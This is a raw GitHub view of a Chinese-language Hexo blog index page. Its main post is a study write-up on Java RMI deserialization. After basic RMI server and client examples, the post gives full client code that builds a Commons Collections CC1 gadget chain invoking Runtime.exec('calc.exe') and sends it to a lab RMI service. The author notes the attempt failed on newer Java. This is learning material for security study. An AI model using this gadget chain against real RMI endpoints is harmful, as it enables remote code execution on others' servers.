-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathindex.html
603 lines (403 loc) · 69.5 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.3.0">
<link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
<link rel="icon" type="image/png" sizes="32x32" href="/images/%E7%8B%97%E7%8B%97.svg">
<link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
<link rel="mask-icon" href="/images/logo.svg" color="#222">
<link rel="stylesheet" href="/css/main.css">
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
<script id="hexo-configurations">
var NexT = window.NexT || {};
var CONFIG = {"hostname":"example.com","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
</script>
<meta property="og:type" content="website">
<meta property="og:title" content="GiDunPar's Blog">
<meta property="og:url" content="http://example.com/index.html">
<meta property="og:site_name" content="GiDunPar's Blog">
<meta property="og:locale" content="zh_CN">
<meta property="article:author" content="GiDunPar">
<meta name="twitter:card" content="summary">
<link rel="canonical" href="http://example.com/">
<script id="page-configurations">
// https://hexo.io/docs/variables.html
CONFIG.page = {
sidebar: "",
isHome : true,
isPost : false,
lang : 'zh-CN'
};
</script>
<title>GiDunPar's Blog</title>
<noscript>
<style>
.use-motion .brand,
.use-motion .menu-item,
.sidebar-inner,
.use-motion .post-block,
.use-motion .pagination,
.use-motion .comments,
.use-motion .post-header,
.use-motion .post-body,
.use-motion .collection-header { opacity: initial; }
.use-motion .site-title,
.use-motion .site-subtitle {
opacity: initial;
top: initial;
}
.use-motion .logo-line-before i { left: initial; }
.use-motion .logo-line-after i { right: initial; }
</style>
</noscript>
<link rel="alternate" href="/atom.xml" title="GiDunPar's Blog" type="application/atom+xml">
</head>
<body itemscope itemtype="http://schema.org/WebPage">
<div class="container use-motion">
<div class="headband"></div>
<header class="header" itemscope itemtype="http://schema.org/WPHeader">
<div class="header-inner"><div class="site-brand-container">
<div class="site-nav-toggle">
<div class="toggle" aria-label="切换导航栏">
<span class="toggle-line toggle-line-first"></span>
<span class="toggle-line toggle-line-middle"></span>
<span class="toggle-line toggle-line-last"></span>
</div>
</div>
<div class="site-meta">
<a href="/" class="brand" rel="start">
<span class="logo-line-before"><i></i></span>
<h1 class="site-title">GiDunPar's Blog</h1>
<span class="logo-line-after"><i></i></span>
</a>
</div>
<div class="site-nav-right">
<div class="toggle popup-trigger">
</div>
</div>
</div>
<nav class="site-nav">
<ul id="menu" class="main-menu menu">
<li class="menu-item menu-item-home">
<a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>
</li>
<li class="menu-item menu-item-about">
<a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>
</li>
<li class="menu-item menu-item-archives">
<a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>
</li>
</ul>
</nav>
</div>
</header>
<div class="back-to-top">
<i class="fa fa-arrow-up"></i>
<span>0%</span>
</div>
<main class="main">
<div class="main-inner">
<div class="content-wrap">
<div class="content index posts-expand">
<article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
<link itemprop="mainEntityOfPage" href="http://example.com/2021/12/05/JAVA%E5%AE%89%E5%85%A8%E4%B9%8BRMI%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/me.jpg">
<meta itemprop="name" content="GiDunPar">
<meta itemprop="description" content="">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="GiDunPar's Blog">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/2021/12/05/JAVA%E5%AE%89%E5%85%A8%E4%B9%8BRMI%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" class="post-title-link" itemprop="url">JAVA安全之RMI反序列化</a>
</h2>
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建时间:2021-12-05 12:16:39 / 修改时间:16:24:22" itemprop="dateCreated datePublished" datetime="2021-12-05T12:16:39+08:00">2021-12-05</time>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<p>前几天和师傅们一起下班,聊到了<code>Fastjson</code>不出网利用,想到<code>Fastjson</code>我只是复现过能出网的<code>JdbcRowSetImpl</code>链,其它姿势还没有仔细了解过,现在补补课。</p>
<h2 id="一、RMI基础概念"><a href="#一、RMI基础概念" class="headerlink" title="一、RMI基础概念"></a>一、RMI基础概念</h2><p>在JAVA中有几个机制是用来远程调用代码的,包括<code>RMI</code>、<code>JNI</code>、<code>Jython</code>,其中<code>RMI</code>用来调用JAVA代码、<code>JNI</code>用来调用C代码、<code>Jython</code>用来调用python代码。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">RMI(Remote Method Invocation,远程方法调用)是用Java在JDK1.2中实现的,它大大增强了Java开发分布式应用的能力。</span><br></pre></td></tr></table></figure>
<p><code>RMI</code>规范可以通过<code>JRMP</code>和<code>IIOP</code>协议实现,JAVA默认使用<code>JRMP</code>协议。而在<code>Weblogic</code>中对<code>RMI</code>规范的实现使用T3协议。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">JRMP:Java Remote Message Protocol ,Java 远程消息交换协议。这是运行在Java RMI之下、TCP/IP之上的线路层协议。该协议要求服务端与客户端都为Java编写,就像HTTP协议一样,规定了客户端和服务端通信要满足的规范。</span><br></pre></td></tr></table></figure>
<h2 id="二、RMI基础运用"><a href="#二、RMI基础运用" class="headerlink" title="二、RMI基础运用"></a>二、RMI基础运用</h2><p><code>RMI</code>允许运行在一个Java虚拟机的对象调用运行在另一个Java虚拟机上的对象的方法。 这两个虚拟机可以是运行在相同计算机上的不同进程中,也可以是运行在网络上的不同计算机中。</p>
<p><code>RMI</code>的使用主要分为三部分:<code>Server</code>、<code>Client</code>、<code>Registry </code>。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Server: 提供远程的对象</span><br><span class="line">Client: 调用远程的对象</span><br><span class="line">Registry: 一个注册表,存放着远程对象的位置(ip、端口、标识符)</span><br></pre></td></tr></table></figure>
<h3 id="1、定义远程接口"><a href="#1、定义远程接口" class="headerlink" title="1、定义远程接口"></a>1、定义远程接口</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.rmi;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.rmi.Remote;</span><br><span class="line"><span class="keyword">import</span> java.rmi.RemoteException;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">interface</span> <span class="title">rmidemo</span> <span class="keyword">extends</span> <span class="title">Remote</span> </span>{</span><br><span class="line"> <span class="function"><span class="keyword">public</span> String <span class="title">hello</span><span class="params">()</span> <span class="keyword">throws</span> RemoteException</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>需要注意的是该接口需要继承<code>java.rmi.Remote</code>接口,定义该接口时需要指定为<code>public</code>,接口中声明的方法都要抛出一个<code>RemoteException</code>异常。</p>
<h3 id="2、定义远程接口实现类"><a href="#2、定义远程接口实现类" class="headerlink" title="2、定义远程接口实现类"></a>2、定义远程接口实现类</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.rmi;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.rmi.RemoteException;</span><br><span class="line"><span class="keyword">import</span> java.rmi.server.UnicastRemoteObject;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">RemoteHelloWorld</span> <span class="keyword">extends</span> <span class="title">UnicastRemoteObject</span> <span class="keyword">implements</span> <span class="title">rmidemo</span></span>{</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">protected</span> <span class="title">RemoteHelloWorld</span><span class="params">()</span> <span class="keyword">throws</span> RemoteException </span>{</span><br><span class="line"> System.out.println(<span class="string">"构造方法"</span>);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">public</span> String <span class="title">hello</span><span class="params">()</span> <span class="keyword">throws</span> RemoteException </span>{</span><br><span class="line"> System.out.println(<span class="string">"hello方法被调用"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"hello,world"</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>实现类需要继承<code>UnicastRemoteObject</code>接口。</p>
<h3 id="3、服务端"><a href="#3、服务端" class="headerlink" title="3、服务端"></a>3、服务端</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.rmi;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.rmi.RemoteException;</span><br><span class="line"><span class="keyword">import</span> java.rmi.registry.LocateRegistry;</span><br><span class="line"><span class="keyword">import</span> java.rmi.registry.Registry;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">servet</span> </span>{</span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> RemoteException </span>{</span><br><span class="line"> rmidemo hello = <span class="keyword">new</span> RemoteHelloWorld();<span class="comment">//创建远程对象</span></span><br><span class="line"> Registry registry = LocateRegistry.createRegistry(<span class="number">1099</span>);<span class="comment">//创建注册表</span></span><br><span class="line"> registry.rebind(<span class="string">"hello"</span>,hello);<span class="comment">//将远程对象注册到注册表里面,并且设置值为hello</span></span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>服务端创建一个注册表,并将要远程调用的对象注册到注册表里,</p>
<h3 id="4、客户端"><a href="#4、客户端" class="headerlink" title="4、客户端"></a>4、客户端</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.rmi.rmiclient;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> com.rmi.RemoteHelloWorld;</span><br><span class="line"><span class="keyword">import</span> com.rmi.rmidemo;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.rmi.NotBoundException;</span><br><span class="line"><span class="keyword">import</span> java.rmi.Remote;</span><br><span class="line"><span class="keyword">import</span> java.rmi.RemoteException;</span><br><span class="line"><span class="keyword">import</span> java.rmi.registry.LocateRegistry;</span><br><span class="line"><span class="keyword">import</span> java.rmi.registry.Registry;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">clientdemo</span> </span>{</span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> RemoteException, NotBoundException </span>{</span><br><span class="line"> Registry registry = LocateRegistry.getRegistry(<span class="string">"localhost"</span>, <span class="number">1099</span>);<span class="comment">//获取远程主机对象</span></span><br><span class="line"> <span class="comment">// 利用注册表的代理去查询远程注册表中名为hello的对象</span></span><br><span class="line"> rmidemo hello = (rmidemo) registry.lookup(<span class="string">"hello"</span>);</span><br><span class="line"> <span class="comment">// 调用远程方法</span></span><br><span class="line"> System.out.println(hello.hello());</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>通过<code>RMI</code>协议,获取服务端绑定到注册表的远程对象。在调用远程对象的方法时,如果传入方法的参数是序列化的数据,那么在那么服务端就会对传入的数据进行反序列化。实际测试呢,服务器先起一个<code>RMI</code>服务,客户端传入的序列化数据是用来命令执行的数据,传给服务端,此时应该在服务端能看到执行了命令,下面尝试复现。</p>
<h2 id="三、RMI反序列化测试"><a href="#三、RMI反序列化测试" class="headerlink" title="三、RMI反序列化测试"></a>三、RMI反序列化测试</h2><h3 id="1、定义远程接口-1"><a href="#1、定义远程接口-1" class="headerlink" title="1、定义远程接口"></a>1、定义远程接口</h3><p>需要使用到<code>RMI</code>进行反序列化攻击需要两个条件:接收<code>Object</code>类型的参数、<code>RMI</code>的服务端存在执行命令利用链。因为之前学习的<code>Commons Collections</code>链,所以环境还是用的那一套。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.rmidemo;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.rmi.Remote;</span><br><span class="line"><span class="keyword">import</span> java.rmi.RemoteException;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">interface</span> <span class="title">User</span> <span class="keyword">extends</span> <span class="title">Remote</span> </span>{</span><br><span class="line"> <span class="function"><span class="keyword">public</span> String <span class="title">hello</span><span class="params">(String hello)</span> <span class="keyword">throws</span> RemoteException</span>;</span><br><span class="line"> <span class="function"><span class="keyword">void</span> <span class="title">work</span><span class="params">(Object obj)</span> <span class="keyword">throws</span> RemoteException</span>;</span><br><span class="line"> <span class="function"><span class="keyword">void</span> <span class="title">say</span><span class="params">()</span> <span class="keyword">throws</span> RemoteException</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>其中我们要调用<code>work</code>方法,传入一个序列化的<code>object</code>参数。</p>
<p><img src="../images2/1.png" alt="image-20211205005117547"></p>
<h3 id="2、定义远程接口实现类-1"><a href="#2、定义远程接口实现类-1" class="headerlink" title="2、定义远程接口实现类"></a>2、定义远程接口实现类</h3><p>这个实现类不用完成什么,就把接口里的函数定义一下,输出一行作测试用。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.rmidemo;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.rmi.RemoteException;</span><br><span class="line"><span class="keyword">import</span> java.rmi.server.RMIClientSocketFactory;</span><br><span class="line"><span class="keyword">import</span> java.rmi.server.RMIServerSocketFactory;</span><br><span class="line"><span class="keyword">import</span> java.rmi.server.UnicastRemoteObject;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">UserImpl</span> <span class="keyword">extends</span> <span class="title">UnicastRemoteObject</span> <span class="keyword">implements</span> <span class="title">User</span> </span>{</span><br><span class="line"> <span class="function"><span class="keyword">protected</span> <span class="title">UserImpl</span><span class="params">()</span> <span class="keyword">throws</span> RemoteException </span>{</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">protected</span> <span class="title">UserImpl</span><span class="params">(<span class="keyword">int</span> port)</span> <span class="keyword">throws</span> RemoteException </span>{</span><br><span class="line"> <span class="keyword">super</span>(port);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">protected</span> <span class="title">UserImpl</span><span class="params">(<span class="keyword">int</span> port, RMIClientSocketFactory csf, RMIServerSocketFactory ssf)</span> <span class="keyword">throws</span> RemoteException </span>{</span><br><span class="line"> <span class="keyword">super</span>(port, csf, ssf);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">public</span> String <span class="title">hello</span><span class="params">(String hello)</span> <span class="keyword">throws</span> RemoteException </span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"hello"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">work</span><span class="params">(Object obj)</span> <span class="keyword">throws</span> RemoteException </span>{</span><br><span class="line"> System.out.println(<span class="string">"work被调用了"</span>);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">say</span><span class="params">()</span> <span class="keyword">throws</span> RemoteException </span>{</span><br><span class="line"> System.out.println(<span class="string">"say"</span>);</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>在函数里输出一行文字,代表函数执行</p>
<p><img src="../images2/2.png" alt="image-20211205005404483"></p>
<h3 id="3、服务端-1"><a href="#3、服务端-1" class="headerlink" title="3、服务端"></a>3、服务端</h3><p>服务端起一个<code>RMI</code>服务,并将远程对象绑定到注册表中</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.rmidemo;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.rmi.RemoteException;</span><br><span class="line"><span class="keyword">import</span> java.rmi.registry.LocateRegistry;</span><br><span class="line"><span class="keyword">import</span> java.rmi.registry.Registry;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">server</span> </span>{</span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> RemoteException </span>{</span><br><span class="line"> User user = <span class="keyword">new</span> UserImpl();</span><br><span class="line"> Registry registry = LocateRegistry.createRegistry(<span class="number">1099</span>);</span><br><span class="line"> registry.rebind(<span class="string">"user"</span>,user);</span><br><span class="line"> System.out.println(<span class="string">"rmi running...."</span>);</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><img src="../images2/3.png" alt="image-20211205005634019"></p>
<h3 id="4、客户端-1"><a href="#4、客户端-1" class="headerlink" title="4、客户端"></a>4、客户端</h3><p>客户端要传一个序列化的数据,为了测试方便,我们直接在客户端代码里写一个序列化的函数,返回一个<code>Object</code>类型的序列化数据进行传参。具体应该序列化哪个类,要看服务端的哪个依赖是可以反序列化命令执行的,这里因为本地测试,服务端用的就是<code>Commons Collections3.1</code>的库,所以客户端传的数据就是按照CC1链构造的。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.rmidemo;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.Transformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ChainedTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ConstantTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.map.TransformedMap;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.lang.annotation.Retention;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Constructor;</span><br><span class="line"><span class="keyword">import</span> java.rmi.Naming;</span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"><span class="keyword">import</span> java.util.Map;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">client</span> </span>{</span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception </span>{</span><br><span class="line"> String url = <span class="string">"rmi://192.168.195.128:1099/user"</span>;</span><br><span class="line"> User userClient = (User) Naming.lookup(url);</span><br><span class="line"> userClient.work(getpayload());</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> Object <span class="title">getpayload</span><span class="params">()</span> <span class="keyword">throws</span> Exception</span>{</span><br><span class="line"> Transformer[] transformers = <span class="keyword">new</span> Transformer[]{</span><br><span class="line"> <span class="keyword">new</span> ConstantTransformer(Runtime.class),</span><br><span class="line"> <span class="keyword">new</span> InvokerTransformer(<span class="string">"getMethod"</span>, <span class="keyword">new</span> Class[]{String.class, Class[].class}, <span class="keyword">new</span> Object[]{<span class="string">"getRuntime"</span>, <span class="keyword">new</span> Class[<span class="number">0</span>]}),</span><br><span class="line"> <span class="keyword">new</span> InvokerTransformer(<span class="string">"invoke"</span>, <span class="keyword">new</span> Class[]{Object.class, Object[].class}, <span class="keyword">new</span> Object[]{<span class="keyword">null</span>, <span class="keyword">new</span> Object[<span class="number">0</span>]}),</span><br><span class="line"> <span class="keyword">new</span> InvokerTransformer(<span class="string">"exec"</span>, <span class="keyword">new</span> Class[]{String.class}, <span class="keyword">new</span> Object[]{<span class="string">"calc.exe"</span>})</span><br><span class="line"> };</span><br><span class="line"> Transformer transformerChain = <span class="keyword">new</span> ChainedTransformer(transformers);</span><br><span class="line"> Map map = <span class="keyword">new</span> HashMap();</span><br><span class="line"> map.put(<span class="string">"value"</span>, <span class="string">"sijidou"</span>);</span><br><span class="line"> Map transformedMap = TransformedMap.decorate(map, <span class="keyword">null</span>, transformerChain);</span><br><span class="line"></span><br><span class="line"> Class cl = Class.forName(<span class="string">"sun.reflect.annotation.AnnotationInvocationHandler"</span>);</span><br><span class="line"> Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);</span><br><span class="line"> ctor.setAccessible(<span class="keyword">true</span>);</span><br><span class="line"> Object instance = ctor.newInstance(Retention.class, transformedMap);</span><br><span class="line"> <span class="keyword">return</span> instance;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>具体这个序列化数据的构造可以看上一篇文章。</p>
<p><img src="../images2/4.png" alt="image-20211205010510493"></p>
<p>现在服务端先起一个<code>RMI</code>服务,并注册对象</p>
<p><img src="../images2/5.png" alt="image-20211205010822030"></p>
<p>然后客户端也执行,按理说是要弹出一个计算器的,但是这没弹出来,可以看到用的是<code>AnnotationInvocationHandler</code>的<code>ReadObject</code>到<code>TransformedMap</code>的<code>setValue</code>,这里序列化没有问题,但是由于JAVA版本限制,高版本JAVA里已经去掉了<code>AnnotationInvocationHandler</code>里<code>TransformedMap</code>的<code>setValue</code>了,具体上一篇文章也介绍了,因为也是测试,懒得再搭了,知道为啥就行。</p>
<p><img src="../images2/6.png" alt="image-20211205010957035"></p>
<h2 id="四、总结"><a href="#四、总结" class="headerlink" title="四、总结"></a>四、总结</h2><p>现在对这个<code>RMI</code>的利用有点迷糊,不知道具体攻击场景是什么,如果服务端是自己起的<code>RMI</code>,那么控制客户端传序列化数据时候,反序列化的也是服务端,这有啥用?自己打自己?或者说用受害者的<code>RMI</code>服务?没见过具体场景,不太清楚,不过只是为<code>Fastjson</code>做铺垫,就不继续深入了,以后有机会遇到,再来续一篇。</p>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
<article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
